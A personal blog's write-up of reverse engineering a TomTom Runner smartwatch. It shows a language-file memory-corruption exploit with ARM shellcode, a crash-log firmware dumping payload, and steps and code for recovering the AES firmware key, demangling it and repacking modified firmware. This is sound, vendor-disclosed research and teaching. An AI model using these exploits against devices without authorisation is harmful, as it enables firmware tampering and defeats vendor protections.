Luis Grangeia A personal blog

Hacking Smartwatches - the TomTom Runner, part 3 (final)

This is the third and final post of a series about embedded firmware hacking and reverse engineering of an IoT device, a TomTom Runner GPS Smartwatch. You should start by reading part one and part two of this series.

I originally intended this series to contain only three posts, and in order to achieve that, this post is longer than anticipated. Here is a table of contents for easier navigation:

  1. Finding familiar code: Using the exploit to exfiltrate the first bits of data from the firmware.
  2. Disassembling dumped code: First experiences with objdump to disassemble the recovered firmware fragments.
  3. Improving the dumping procedure: As a result of the reversing of a subroutine, we were able to improve the dumping routine dramatically and extract the full bootloader.
  4. AES key brute-force approach: Our first naive approach to recover the AES key by scraping the bootloader binary.
  5. Static analysis with IDA: Loading the dumped bootloader into IDA and locating the AES S-Box, the key expansion routine, and the key's location in RAM.
  6. Runtime debugging with QEMU: A couple of cool tricks to make runtime debugging of the dumped bootloader easy, including QEMU + IDA configuration, and creating a runnable ELF binary to debug natively on ARM systems with GDB.
  7. Final hurdles and MD5 verifications: After recovering the AES key we must be able to unpack and repack the firmware file. Some hurdles had to be overcome, and MD5 checksums were found and computed.
  8. Putting it all together: Here we demonstrate unpacking and modifying an encrypted firmware file and successfully uploading it back to the device.
  9. Conclusion and next steps: Wrap-up for this series, ideas for future firmware modifications, upcoming TomTom watches, and other wearable devices.

Also, I’ve set up a github repository where I’ll keep the scripts and other tools / notes used in this research. It already contains some scripts but I intend to document it further in the next few days.

In the first post of this series I introduced you to the TomTom Runner. In the second one I showed you how I found a memory corruption vulnerability and took advantage of it to gain control over the execution flow and run arbitrary code on the watch.

If we were talking about a common architecture, such as a Windows PC or an Android smartphone, we could have stopped there: when researching bugs on these platforms, the researcher usually leaves the “weaponization” of the code as an exercise to the reader (or does it privately for a profit, but that is a subject for another post). My point is that on these systems the work stops when the bug is found and reliably exploited.

However, as I painfully learned, when exploiting a foreign platform (non-standard software and hardware), having arbitrary code execution is only the beginning of a long process.

01. Finding familiar code

We ended our last post showing how we could upload (and then execute) arbitrary code to the watch. We proved that we could execute the code by forcing a crash and reading the values of the registers on the crash log after the CPU faulted and the watch rebooted.

Crashlog - SW ver 1.8.42
 R0 = 0x00000000
 R1 = 0x00001337
 R2 = 0x00000013
 R3 = 0x00000037
 R12 = 0x00000000
 LR [R14] = 0x00441939 subroutine call return address
 PC [R15] = 0x00000000 program counter
 PSR = 0x20000000
 BFAR = 0xe000ed38
 CFSR = 0x00020000
 HFSR = 0x40000000
 DFSR = 0x00000000
 AFSR = 0x00000000
 Batt = 4192 mV
 stack hi = 0x000004d4

Since we don’t have access to the firmware, we don’t know a lot of things, such as addresses of library functions, how to open/write files on the EEPROM, how to write to the LCD or how to communicate using USB. Had we known those things, the process to dump the device’s firmware would be relatively straightforward.

The only obvious way to learn about the contents of the firmware is to load memory positions to registers and induce a crash so that the resulting crashlog contains the interesting values. This can be done with the following assembler code:

ldr r4, =0x00400000
ldr r0, [r4], #0x04
ldr r1, [r4], #0x04
ldr r2, [r4], #0x04
ldr r3, [r4], #0x04
ldr r12,[r4], #0x04
ldr lr, [r4], #0x04
mov r4, #0x00
bx r4

(I now know that most of these ldr can be optimized into a single ldmia instruction, but bear with me. I knew zero about ARM assembler when I started this project.)

What this code does is load the contents of address 0x00400000 into the 32 bits of r0, then the next 32 bits into r1 and so on. We even use the lr register, which usually holds the return address, because we don’t need to return from this code. Then we induce a crash by attempting to bx into 0x00000000, which will always fail on a Cortex-M4 (as explained in the last post).

Using this code we can extract 24 bytes of RAM or ROM every time we reboot the device. The actual process works like this:

  • We craft our payload by assembling the instructions and inserting them into the correct region of the language file;
  • We then upload the file to the watch;
  • We unplug the watch from USB, wait 2-3 seconds for it to boot;
  • We then proceed to the language menu and try to select a specific language. The device will crash and reboot;
  • We plug the device back to the PC and read the crash log file containing the chosen bytes of RAM (or ROM).

This process must be repeated for every 24 bytes we wish to extract from the device. I automated all the possible bits into a Python script, but the process still involves plugging and unplugging the device’s USB connection to the PC and manually interacting with it.
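The scraping side of that script is simple; here is a rough sketch of the idea (this is not the actual dump_script.py, just an illustration that parses a crash log like the one above back into the 24 dumped bytes):

import re
import struct

# the payload loads consecutive words into these registers, in this order
REG_ORDER = ['R0', 'R1', 'R2', 'R3', 'R12', 'LR']

def crashlog_to_bytes(log_text):
    """Turn one crash log into the 24 bytes the payload loaded from ROM/RAM."""
    regs = {}
    for line in log_text.splitlines():
        m = re.match(r'\s*(R0|R1|R2|R3|R12|LR)\b.*=\s*(0x[0-9a-fA-F]+)', line)
        if m:
            regs[m.group(1)] = int(m.group(2), 16)
    # each register holds one little-endian 32-bit word of the dump
    return b''.join(struct.pack('<I', regs[name]) for name in REG_ORDER)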

After some practice I could do a “cycle” of this process in around 20 to 30 seconds. Since we know the firmware is around 400kb, extracting the whole of it would take around six days of constant device reboots and button mashing, without sleeping or eating. I don’t know about you but that doesn’t seem like a particularly fun use of my time :)

So we need to be very specific and find interesting bits of memory to dump and analyze. I could think of only one good place to start: the code that generates the crash log file. It checked all the boxes:

  • It should be easy to find: Since the code must be called when there’s a hard fault of the CPU, it must be indexed in a table at a specific address;
  • It should be simple and self-contained: This code only needs to gather some information and write it to a file on the EEPROM;
  • It does what we want to do: This code can write to a file on the EEPROM, which is exactly what we need in order to dump the entire contents of the firmware.

How do we find the starting address for the hard fault routine? Looking at the Atmel datasheet for the MCU gives us what we need: The address for the routine is at the Vector Table, as shown here:

Vector Table

The Vector Table itself is mapped at address 0x00000000 on boot but it may be relocated. To find the current address of the Vector Table we can use the Vector Table Offset Register (SCB_VTOR), which is memory mapped at 0xE000ED08 as shown here:

Vector Table Offset Register

So this code should get us the starting address for the fault handler:

.syntax unified
.thumb

/* Load VTOR address */
ldr r2, =0xE000ED08
ldr r3, [r2]

/* add offset to hardfault address */
mov r1, #0x0c
add r2, r3, r1

/* load hardfault address */
ldr r3, [r2]

/* halt and catch fire */
mov r4, #0x00
bx r4

/* RESULT: hardfault address is 0x0040bfa1 */

When we execute this code on the device, the value we get for r3 in the crash log is 0x0040bfa1, so we can assume that the hard fault handler code starts at 0x0040bfa0 (remember that the LSB only specifies Thumb mode).

Using some Python magic (script dump_script.py) we dump some bytes from this address and we get the main routine of the hard fault handler code.

02. Disassembling dumped code

Before I show you the recovered code we must arrange it in binary form in a way that it can be easily disassembled and analyzed. The easiest thing to do is to create a zero-filled file of 1 megabyte (our firmware is smaller than that). Then using Python we can start populating this file at the correct offsets, assuming that the base of the ROM is at address 0x00400000.

The script dump_script.py automates the whole process of dumping region “x” from the device and writing to this file (DUMP.bin).
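The bookkeeping is trivial; a minimal sketch of the idea (the address-to-offset mapping is the only subtlety):

ROM_BASE = 0x00400000

def init_dump(path='DUMP.bin', size=0x100000):
    """Create the 1 MB zero-filled image we patch chunks into."""
    with open(path, 'wb') as f:
        f.write(b'\x00' * size)

def write_chunk(address, data, path='DUMP.bin'):
    """Store a dumped chunk at the file offset matching its ROM address."""
    with open(path, 'r+b') as f:
        f.seek(address - ROM_BASE)
        f.write(data)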

We can disassemble the recovered code using objdump or IDA. Remember that, since we can only dump 24 bytes at a time, we’re going to be looking at incomplete code.

We can disassemble the code with objdump like so:

arm-none-eabi-objdump -D -s -b binary --show-raw-insn --prefix-addresses -EL --adjust-vma=0x00400000 -marm -M force-thumb -C DUMP.bin

Here is the beginning of our hard fault handler code:

0x0040bfa0 f01e 0f04    tst.w   lr, #4
0x0040bfa4 bf0c         ite     eq
0x0040bfa6 f3ef 8008    mrseq   r0, MSP
0x0040bfaa f3ef 8009    mrsne   r0, PSP
0x0040bfae f004 bedb    b.w     0x00410d68

At this point I did some Google searches based on the format of the crash log file and found this page, containing an example function authored by Joseph Yiu for a Cortex-M3/M4 fault handler. Note the similarities of the printf() outputs with the crash log file (shown at the beginning of this post), and especially the assembler function preamble, which is - byte for byte - the same code we extracted from the device.

.syntax unified
.cpu cortex-m3
.thumb

.global HardFault_Handler
.extern hard_fault_handler_c

HardFault_Handler:
  TST LR, #4
  ITE EQ
  MRSEQ R0, MSP
  MRSNE R0, PSP
  B hard_fault_handler_c

Code taken directly from the blog post from 2011. Note the similarities with the dumped code above

It seems we’re at the right place :)

03. Improving the dumping procedure

What I did next was to dump the main hard fault subroutine and replicate it in the exploit payload. The objective was to experiment with changing the code in order to dump more bytes at a time. The hard fault routine is similar to the skeleton code by Joseph Yiu, but not the same. In addition, it:

  • Obtains some more information regarding firmware version and battery levels;
  • Opens a file on the EEPROM and writes to it (as opposed to the original code which writes to stdout);
  • Reboots the device.

I had to do some static analysis and dump some parts of the code, but the main way of finding out what each subroutine did was to upload the modified code and run it directly on the device. Note that we don’t need to dump all the code, just the main routine; we call the other routines directly in ROM space. Remember that our goal here is to increase the number of bytes that can be exfiltrated from the device each time. After some evenings I was somewhat successful. Here is the code I have to show:

 1 .syntax unified
 2 .thumb
 3 
 4 push    {r0-r12, lr}    /* save registers and return address */
 5 sub.w   sp, sp, #616    /* resize stack */
 6 
 7 bl      fillup          /* fill stack with mem dump */
 8 
 9 mov.w   r1, #512        /* arguments for write() */
10 add     r0, sp, #100
11 ldr     r7, =0x00410e39 /* call write() */
12 blx     r7
13 
14 add.w   sp, sp, #616    /* shrink back stack */
15 pop     {r0-r12, lr}    
16 bx      lr              /* return from exploit payload (END) */
17 
18 /**** 'fillup' function populates the stack with memory *****/ 
19 fillup:
20 add     r4, sp, #100
21 
22 /* first 8 bytes **must** contain the string "Crashlog" */
23 ldr     r7, =0x73617243
24 str     r7, [r4], #4
25 ldr     r7, =0x676f6c68
26 str     r7, [r4], #4
27 
28 ldr     r7, =0x00408706 /* Starting address for the dump */
29 add     r4, sp, #108
30 mov     r3, #94
31 lp1:
32     ldr     r8, [r7], #4
33     str     r8, [r4], #4
34     sub     r3, #1
35     cbz     r3, end
36     b       lp1
37 end:
38 bx lr                   /* return from 'fillup' function */

After a lot of trial and error I was able to identify a function at 0x00410e38 that I dubbed “write()”. This function takes two arguments: A pointer to a buffer and a size (lines 9-10). It then writes the buffer to the crash log file. The funny thing: It does not write more than 376 bytes and the first 8 must be the string “Crashlog” (see lines 23-26). Don’t ask me how I figured this out, as it was late in the evening (or early morning depending on how you look at it).

So I basically assembled this, loaded it into the watch and had a way to dump 376 bytes per device reboot, which was a vast improvement over the previous 24 byte limit.

With this script it was possible to dump the entire firmware in a reasonable amount of time. I started on address 0x00400000 and discovered that from this address to 0x00408000 we can find the device’s bootloader. In a matter of a few minutes (or around 90 device reboots) I was able to dump it entirely.

Since the bootloader is responsible for the flashing of the firmware file it should contain the AES key to decrypt it.

To recap, this is what we know so far regarding the firmware update procedure:

Firmware Upgrade

  1. Firmware is uploaded via USB to the EEPROM chip;
  2. Upon reboot, the bootloader checks if there’s a new firmware file on the EEPROM, and verifies if it’s valid;
  3. If valid, the bootloader decrypts and flashes the firmware on the Atmel chip (internal flash)

We know all this by looking at previous hints but also by analyzing the bootloader we dumped. I will focus next on analyzing the bootloader, both statically (looking at the code) and dynamically (emulating + debugging).

But first, a brief aside on a quick way we tried to find the AES key to the encrypted firmware file.

04. AES key brute-force approach

Having dumped the entire bootloader we can conclude that:

  • The bootloader must contain all the information necessary to decrypt the main firmware file, namely the AES decryption key;
  • It is very likely the firmware is encrypted in AES ECB mode;
  • We already have pieces of the main firmware’s plaintext;
  • An AES key is a random string of 128, 192 or 256 bits.

Armed with these pieces of information, my busticati friend pmsac (at toxyn.org) contributed a small Python script that sweeps the bootloader and tries to decrypt the main firmware file with every consecutive 16-byte string contained in the dumped bootloader (a byte-by-byte sliding window over the entire bootloader file, not really caring about duplicates). There was also some care to make sure we were working with the right endianness. The resulting outputs were then passed through “ent”, and the calculated entropy value was used to decide whether a given “plaintext” was the desired output.
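In sketch form, the approach looks something like this (this is not pmsac’s actual script: it assumes pycryptodome for the AES part, uses a crude byte-frequency entropy estimate instead of ent, and the file names are just illustrative, assuming the 32 KB bootloader dump was saved to its own file):

import math
from collections import Counter
from Crypto.Cipher import AES  # pycryptodome

def entropy(data):
    """Shannon entropy in bits per byte; ~8.0 means still random/encrypted."""
    counts = Counter(data)
    return -sum(c / len(data) * math.log2(c / len(data)) for c in counts.values())

bootloader = open('BOOTLOADER.bin', 'rb').read()
sample = open('0x000000F0', 'rb').read()[0x400:0x800]  # a slice of the encrypted payload

candidates = []
for i in range(len(bootloader) - 15):
    window = bootloader[i:i+16]
    for key in (window, window[::-1]):  # crude stand-in for the endianness handling
        plain = AES.new(key, AES.MODE_ECB).decrypt(sample)
        candidates.append((entropy(plain), hex(i), key.hex()))

candidates.sort()
print(candidates[:5])  # a low-entropy result here would have meant a hit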

Unfortunately this did not produce a valid result. All of the resulting “plaintexts” had no recognizable strings and still had very high entropy, characteristic of encrypted/random byte sequences.

We must make sense of the bootloader and try to understand why the key was not immediately available.

05. Static analysis with IDA

To load the dumped bootloader binary blob into IDA, it’s just a matter of selecting the ARM little-endian architecture and basing the file at 0x00400000, as the following picture shows:

bootloader loading

The bootloader is not huge by any means (32kb), but since we already know what we’re looking for, it doesn’t make sense to lose time. Let’s go find data structures that AES uses, such as S-Boxes:

AES S-Box

There’s the S-Box :) Following code references to this array we get to the AES functions, and traversing back from those we finally arrive at what looks like the main firmware upgrade routine, at 0x004058d4. Here’s IDA’s graph view of it, just because it looks nice:

Firmware Upgrade Graph

This looks like a nightmare to analyze, but remember: at this stage we’re just looking for something very simple: A reference to the AES key.

At this point it’s important to cover the basics of AES: AES uses three possible key sizes: 128, 192 or 256 bits. Before doing a single round of encryption, AES must perform a computation called key expansion, which takes the master key and derives additional separate keys from it, one for each AES round.

Using static analysis I could recognize the AES key expansion function at 0x00404618. Here it is being called early in the firmware upgrade routine:

AES key expansion
(I named the routines as I was recognizing them in IDA)

The routine takes two arguments, passed in r0 and r1 (the ARM calling convention is helpful here: arguments are almost always passed via registers): the address of the original key (r0) and the size of the key (r1). We learn from this that:

  • Key size is 128 bits (0x10);
  • The key is stored in RAM at 0x2000001c.

There must be some code somewhere that’s loading the key in RAM before this code runs. We have to find it.

This was around the time the limits of my static analysis experience kicked in. I simply could not guess any more and had to see the code running.

Let’s talk a bit about getting this code into a debugger and doing some runtime analysis.

06. Runtime debugging with QEMU

Since we already have the code loaded into IDA Pro, it is a simple matter of using an emulator such as QEMU to emulate and debug the code.

This post was very helpful for the setup. There were some issues with QEMU, namely that there is no QEMU ARM “machine” that emulates RAM in the 0x20000000 range. I had to overcome this by setting breakpoints and manually “remapping” the RAM range to a different region at 0x02000000.

Later I was told about another (better) way to run QEMU to help debug this program, which is to run it in user mode. Basically I found you can run QEMU in three different ways:

  • In kernel mode where you run a single kernel process that talks to the underlying virtual machine hardware directly;
  • In VM mode where you set up a virtual OS environment, usually a Linux kernel and initrd image and filesystem, and then start the program to be debugged inside the VM environment;
  • In user mode, where you run QEMU in a transparent fashion. For instance, if you’re on a Linux x86 system and have a Linux ARM ELF binary, you just run it under qemu-arm and it executes directly.

I found the third option very interesting. All that was needed was to create an ELF executable from the binary blob I had from the bootloader.

This can be done using the GNU linker. Documentation is pretty bad though, so I’ll leave here an example:

Main linker script (linker.ld):

ENTRY(_bl_start)

PHDRS
{
        text PT_LOAD AT (0x00400000) FLAGS (0x7) ;
        data PT_LOAD AT (0x20000000) FLAGS (0x7) ;
}

SECTIONS
{
        .text 0x00400000 : { *(.bootloader) } :text
        .data 0x20000000 : { *(.sram) } :data
        .note.gnu.build-id 0x0 (NOLOAD) : { *(.note.gnu.build-id) } :NONE
}

bootloader.s:

.section .bootloader, "ax"

.global _bl_start
.incbin "BOOTLOADER.bin"
.set _bl_start, 0x004000e5

sram.s (the sram_128k.bin file is merely a null filled file. This is necessary to make the ELF binary pre-allocate the RAM segment):

.section .sram, "awx"
.incbin "sram_128k.bin"

With these three files the ELF binary can be compiled like so:

gcc -static -c sram.s
gcc -static -c bootloader.s
gcc -static -nostdlib -T ./linker.ld -o bootloader.elf bootloader.o sram.o

The cool thing about this is that you can run this binary natively on a Raspberry Pi 2 (but not on the original rPi, because its CPU does not support the udiv instruction for integer division, which the Cortex-M4 uses).

The program will still segfault because it is attempting to read from memory mapped registers outside the RAM region. You can map these register addresses in a similar way to the way we allocated the RAM region, or you can simply step over the offending functions using GDB.

Tracing with GDB in IDA is very easy and you can see the RAM as it gets populated. Without bothering you with the details, here’s what I found out that was happening:

  • Early in the bootloader execution the key is loaded from ROM into RAM. It’s actually at address 0x00406f0c
  • The AES key expansion routine at 0x00404618 is called later and expands the key. However before the expansion is done, a single byte of the key is changed: The first byte of the key is set to 0x04!

We have the firmware key! I won’t post it here because of reasons (I have not consulted my lawyer yet). If you are worthy, with all this help you’ll get it pretty quickly :)
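For completeness, pulling it out of your own bootloader dump takes only a couple of lines (offsets straight from the findings above: the key sits at ROM address 0x00406f0c, i.e. file offset 0x6f0c assuming the dumped BOOTLOADER.bin starts at the 0x00400000 base, with its first byte replaced by 0x04):

bootloader = open('BOOTLOADER.bin', 'rb').read()
key = bytes([0x04]) + bootloader[0x6f0d:0x6f1c]  # 16-byte AES key, first byte patched to 0x04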

07. Final hurdles and MD5 verifications

Using AES ECB with the extracted key provided us with easily recognizable strings and ARM instructions. There was, however, a small hurdle: the TomTom engineers added an additional obfuscation step, and the first byte of each 16-byte plaintext block was off. This was easily spotted by looking at offsets containing ASCII strings.

mangled dump

Again, my friend pmsac managed to break this obfuscation before I had the chance to even try. There is an XOR operation done on the first byte of each block with a rolling value (incremented by 4 on each iteration and wrapping around at 0x80). Here’s the code to “demangle” the first byte of every plaintext block:

def xormask_blob(data):
   bsize = 16            # the mangling works on 16-byte (AES block sized) chunks
   extra = 0             # rolling XOR value: +4 per block, wraps around at 0x80
   output = ''
   i = 0
   while i < len(data):
      output = output + chr(ord(data[i]) ^ extra) + data[i+1:i+bsize]
      extra += 0x4
      extra &= 0x7f
      i += bsize
   return output

The next step was to upload a modified firmware file into the watch. Using static analysis of the firmware upgrade routines I already knew there were two different MD5 verifications. But static analysis has its limits and I couldn’t tell exactly where and how the MD5 sums were verified.

Again my good and talented friends helped. João Poupino built a script that brute-forced a lot of different MD5 calculations over both the plaintext and the ciphertext. Using this script we reached the following conclusions:

  • The first 16-byte block of the firmware file is a “poor man’s HMAC”: it’s the result of md5sum(ciphertext + encryption_key) (a small verification sketch follows this list);
  • In the plaintext there is a second md5sum() of the plaintext at the end of the code to be flashed. I believe it’s used by the bootloader to verify that the code has been correctly flashed.
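A sketch of that first check (the file name is the firmware file we downloaded earlier; treating everything after the first 16-byte block as the “ciphertext” is an assumption of this sketch):

import hashlib

def check_header_md5(fw_path, key):
    """Verify the 'poor man's HMAC' in the first 16-byte block of the firmware file."""
    data = open(fw_path, 'rb').read()
    header, ciphertext = data[:16], data[16:]
    return hashlib.md5(ciphertext + key).digest() == header

# usage: check_header_md5('0x000000F0', key)  -- key being the 16 bytes recovered earlier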

08. Putting it all together

I wrote a small script that decrypts and encrypts a firmware file given its key. Most of the tools and techniques I used in this project are (or will be) published on my github here.

I did a small proof of concept by modifying a string inside the firmware file. Since almost every string you see when normally operating the watch is localized from an external language file (which, as we’ve already seen, is easy to change without touching the main firmware), I had to look for something different: the Test Menu uses hardcoded strings, so I modified the one that originally said “Waiting for cmd”. The new string is much better, as you can see in the pictures.

hex editing custom firmware

hacked test menu

This is an innocuous modification but it proves it is now possible to write custom firmware for the TomTom Runner.

09. Conclusion and next steps

After doing all this and opening up the possibility of creating custom firmware for this device, I really hope I’ve managed to inspire someone to create something cool for this watch. I have some ideas already:

  • Port Linux! (Not really: there’s not enough flash space or RAM to run uClinux, let alone a full-fledged Linux kernel.)
  • Modify the existing firmware: Turning a TomTom Runner into a TomTom Multisport doesn’t seem particularly hard, as it seems the watch only verifies some values in the bootloader region; the firmware is identical. Patching the firmware to always show the Multisport functionality doesn’t seem all that complicated, but I haven’t spent time on that.
  • Create a skeleton source tree from scratch: I’m still not sure, but the firmware seems based on FreeRTOS, an open-source OS. It should be feasible to reverse the hardware drivers (LCD, EEPROM) and recreate a basic firmware to serve as placeholder for an open-source alternative. This should allow for other fun uses for the hardware;
    • A simple smartwatch with smart notifications;
    • A wearable Ubertooth One! (this one would be my favourite, by far).

I will end this by giving a big thank you to everyone that helped me on this project, especially pmsac and João, who might have saved me from permanent insanity. I had a blast, learned quite a lot and hope to have contributed to the research community with these posts.

Regarding TomTom, I made sure I contacted them beforehand, letting them know about this issue. They acknowledged it and have been very polite, and have already implemented some changes to the latest versions of the Firmware. I hope further long term changes get implemented especially on their next line of products, to help mitigate this issue.

Also, I recently bought a new TomTom Spark and I may return to this later to see if the new models are that much different. We’ll see. It should be interesting to see if other smartwatches can be hacked this way. Interesting devices that I encourage people to look at: the Garmin Forerunner line, Polar sports watches and also the Pebble.

If you’re still reading, thank you! Tweet me at @lgrangeia and give me feedback and ideas for new projects.

Hacking Smartwatches - the TomTom Runner, part 2

This is the second of a series of posts about embedded firmware hacking and reverse engineering of an IoT device, a TomTom Runner GPS Smartwatch. You should start by reading part one of this series.

In the previous post I introduced the device and gave a detailed overview of its inner workings. Here’s what we know so far:

  • It’s an ARM device: an Atmel MCU with a Cortex-M4 core;
  • Its firmware is distributed encrypted, likely with AES encryption in ECB mode;
  • It has a 4 Megabyte EEPROM which contains a filesystem with interesting stuff, including:
    • Exercise files (created when you go out for a run);
    • Language files (used to provide the translated menus on the user interface);
    • Configuration files.
  • Most of the USB protocol has been reversed, and a lot of it involves reading and writing files to the EEPROM. We can use ttwatch for these operations.

01. Finding a Vulnerability

The first thing I did was to look at every file on the watch’s EEPROM. Apart from the files above, there were also log files. Here’s an example of one:

log file

This shows that the Bluetooth chip (BLE) has its own firmware and it’s being flashed after its MD5 sum is validated.

I was interested in files that would be parsed by the device. This was because I could change them easily and wanted to try to exploit vulnerabilities in its parsing engine. Two types of files fit that criteria: exercise and language files.

Exercise files have a binary format (ttbin) which has been documented already and there are some tools to convert them to other formats (used by sites such as Runkeeper, Strava etc.) - e.g. ttwatch. I considered those and then put them aside for two reasons:

  • The watch doesn’t parse these files, it only produces them. There’s a menu that shows you the summary of your recent runs, but it’s read from a different file that contains the summary of all runs; the device never reopens the ttbin files for reading.
  • The binary format doesn’t appear to contain variable length fields or strings. This is where parsers usually have bugs. If the format is simple, the parser is simple and bugs are rare.

Language files are more interesting. Let’s look at the content of one:

language file

This has a very simple structure:

  • The first four bytes are a 32-bit little-endian integer representing the size of the file minus the first eight bytes – let’s call it sbuf_size;
  • The next four bytes are a 32-bit little-endian integer representing the number of ASCII strings included in the file – num_strings;
  • The rest of the file contains null-terminated strings, mostly ASCII. Some characters are non-printable, presumably for some custom bitmaps (some menu entries have icons, like an airplane in the “airplane mode” option).

There are lots of situations that could confuse a parser for this file, so I did my list of nasty things to tinker with:

  1. Format strings: I substituted every single string with “%x”;
  2. A zero sbuf_size with a non zero num_strings;
  3. A single large oversized string;
  4. sbuf_size larger than the true file size;
  5. num_strings larger than the true number of null-terminated strings;
  6. No nulls in the strings.

I think you get the picture. The structure is simple enough that you don’t need an automated fuzzer to catch most situations where the parser would fail.
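If you prefer scripting to a hex editor, a tiny generator covers most of these cases; a sketch, following the layout described above:

import struct

def build_language_file(strings, sbuf_size=None, num_strings=None):
    """Language file layout: sbuf_size, num_strings, then NUL-terminated strings.
    Override sbuf_size / num_strings to produce the malformed variants above."""
    blob = b''.join(s.encode('ascii') + b'\x00' for s in strings)
    if sbuf_size is None:
        sbuf_size = len(blob)        # size of the file minus the 8-byte header
    if num_strings is None:
        num_strings = len(strings)
    return struct.pack('<II', sbuf_size, num_strings) + blob

# e.g. cases 1 and 4 above: every string is "%x" and sbuf_size claims far more data
# open('00810003.bin', 'wb').write(build_language_file(['%x'] * 50, sbuf_size=6001))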

It was a simple matter of editing the file with a hex editor on the PC, and then uploading it to the watch using the ttwatch file transfer option:

$ cat 00810003.bin | ttwatch -w 0x00810003

Each file corresponds to a different translation; in this case I changed the German file. Then I would disconnect the watch from USB, change the device’s language to German, and observe the result. For instance, large strings would not crash the watch. Format strings were presented literally, with no format string conversion.

The first interesting result was with a zero sbuf_size and a non-zero num_strings. Here’s a video of it:

Note that the strings are changing during the watch operation. Basically the interface is loading strings (or pointers to said strings) from some RAM region which is written to during the device’s operation.

This was interesting. Even more interesting was the next result: we created a large file with an sbuf_size larger than 6000 bytes - in this case, 6001 bytes - and the file size matched sbuf_size. Here’s the result:

The device appears to reboot when you attempt to change UI language. If I remember correctly, other edge cases would also cause a reboot.

This one was different though, as afterwards there was a new file present on the EEPROM (0x00013000). Here it is:

$ ttwatch -r 0x00013000
Crashlog - SW ver 1.8.42
 R0 = 0x010f0040
 R1 = 0x00000000
 R2 = 0x00000002
 R3 = 0x00000f95
 R12 = 0x00000000
 LR [R14] = 0x00441939 subroutine call return address
 PC [R15] = 0x2001b26c program counter
 PSR = 0x41000000
 BFAR = 0x010f0040
 CFSR = 0x00008200
 HFSR = 0x40000000
 DFSR = 0x00000000
 AFSR = 0x00000000
 Batt = 4160 mV
 stack hi = 0x000004d4

Oh, hi there, crash log!

There’s quite a lot to learn from this file. We get the values of several registers, including the program counter, R0-R3, R12, some state registers (PSR, BFAR, etc.), as well as the battery level and the size of the stack. By repeating the same procedure after a reboot we get the same values for the registers, which means the watch does not implement any kind of memory layout randomization.

What followed was a lot of reading of datasheets and ARM documentation. The most important thing I quickly learned is that the execution flow had moved from the flash ROM to the RAM region. This can be seen in the value of the PC (program counter): it points into a region of memory reserved for RAM. Note the following image from the Atmel datasheet:

memory mappings

For some reason, execution was jumping from the flash ROM region (0x00400000 - 0x00800000) to the SRAM, which starts at address 0x20000000, near where our language file is loaded. If only we could finely control the position of our language file or “nudge” the program counter in the right direction, we could jump to a memory region under our control.

After some fiddling I noticed that there were two different types of crashes: the first one where I selected the corrupted language, and the second one where I merely scrolled past the language on the menu. The latter would also trigger a reboot. It seemed that the language file was parsed / loaded into RAM regardless of whether you selected it or not.

This gave me an idea: I would try to change the content of other language files to see if that would somehow influence the register values.

I changed the next language file in the list of languages to be composed of all B’s (ASCII value 0x42), with the value of sbuf_size unchanged and num_strings set to zero. The previous language file still had a sbuf_size size of 6001. Then I rebooted the watch, went to the language menu and scrolled through the languages. This was the resulting crash:

Crashlog - SW ver 1.8.42
 R0 = 0x2001b088
 R1 = 0x42424242
 R2 = 0x00000002
 R3 = 0x00000f95
 R12 = 0x00000000
 LR [R14] = 0x00441939 subroutine call return address
 PC [R15] = 0x42424242 program counter
 PSR = 0x60000000
 BFAR = 0xe000ed38
 CFSR = 0x00000001
 HFSR = 0x40000000
 DFSR = 0x00000000
 AFSR = 0x00000000
 Batt = 4190 mV
 stack hi = 0x000004d4

Look at that, we can control what goes into the program counter! For some reason, the execution flow is jumping to an address we control. The address jumped to is actually the 4th double-word (32-bit value) in the second file.

02. Code Execution

Ok, we now have a way to divert execution to anywhere on the device’s memory, what can we do? On a normal operating system we usually have lots of known locations in memory we can jump to: system calls, standard library calls, etc. Here we don’t have that luxury.

The first thing to do is to verify the execution of a simple payload. Payload construction can be done in assembler. Here’s my first try:

.syntax unified
.thumb

mov r2, #0x13
mov r3, #0x37

add r1, r3, r2, lsl #8

mov r0, #0
bx r0

We must specify the Thumb instruction set because the Cortex-M4 only works in Thumb mode. This simple program loads two immediate values into r2 and r3, then performs an add with a left shift and stores the result in r1 (r1 = r3 + (r2 << 8) = 0x1337).

The last two lines make a jump to address 0x00000000. This causes a crash every time, and the reason is that ARM processors decide between the ARM and Thumb instruction sets based on the least significant bit of the target address on a bx jump. The LSB is zero, so we’re switching to the ARM instruction set. As explained above, the ARM Cortex-M4 only supports Thumb, so it faults.

We can assemble this on a non-ARM Linux system with a cross-compiler toolchain like so (you wouldn’t need this on an ARM machine, such as a Raspberry Pi):

$ arm-none-eabi-as -mcpu=cortex-m4 -o first.o first.s

Sure enough, here’s the produced code, disassembled using objdump:

$ arm-linux-gnueabi-objdump -d first.o

first.o:     file format elf32-littlearm

Disassembly of section .text:
00000000 <.text>:
   0:	f04f 0213 	mov.w	r2, #19
   4:	f04f 0337 	mov.w	r3, #55	; 0x37
   8:	eb03 2102 	add.w	r1, r3, r2, lsl #8
   c:	f04f 0000 	mov.w	r0, #0
  10:	4700      	bx	r0

Next thing to do is to put this payload inside the watch. We load this into the German language file and then point to it using the pointer that’s being used for the jump (4th double-word from the second file).

The following image shows everything set up on the second file (0x00810003):

memory mappings

The fourth double-word is an absolute pointer to our payload. We then load the file into the watch and do the usual procedure of scrolling through the languages.

(I skipped some steps on finding the correct address for the jump. Basically it boiled down to trial and error and using a NOP sled to find the correct address, nothing fancy. Remember, this is totally deterministic, no randomness whatsoever.)

After the expected crash, here’s the resulting crash log (note the value of R1, R2 and R3):

Crashlog - SW ver 1.8.42
 R0 = 0x00000000
 R1 = 0x00001337
 R2 = 0x00000013
 R3 = 0x00000037
 R12 = 0x00000000
 LR [R14] = 0x00441939 subroutine call return address
 PC [R15] = 0x00000000 program counter
 PSR = 0x20000000
 BFAR = 0xe000ed38
 CFSR = 0x00020000
 HFSR = 0x40000000
 DFSR = 0x00000000
 AFSR = 0x00000000
 Batt = 4192 mV
 stack hi = 0x000004d4

Et voilà! We now have arbitrary code execution on a closed-firmware, wrist-worn IoT device. Yes, we are l33t.

How cool is that? :)

03. To be continued…

Though we’ve gotten far, this is still not the end. We can now execute arbitrary code inside our watch, but we’re still pretty much in the dark. Remember, we want to be able to gain access to the firmware inside the watch, be it by obtaining the encryption key or dumping it from the watch.

How do we do that? How would you do that? I’m ending this post with a challenge: tell me how you would approach this problem. Let me hear your strategies for obtaining more information about the current execution environment, and how you would go about exfiltrating/obtaining the firmware’s encryption key.

Please tweet to me at @lgrangeia with your ideas. Ask me questions and maybe I’ll provide hints. To my friends who already know how I did it, no spoilers please :)

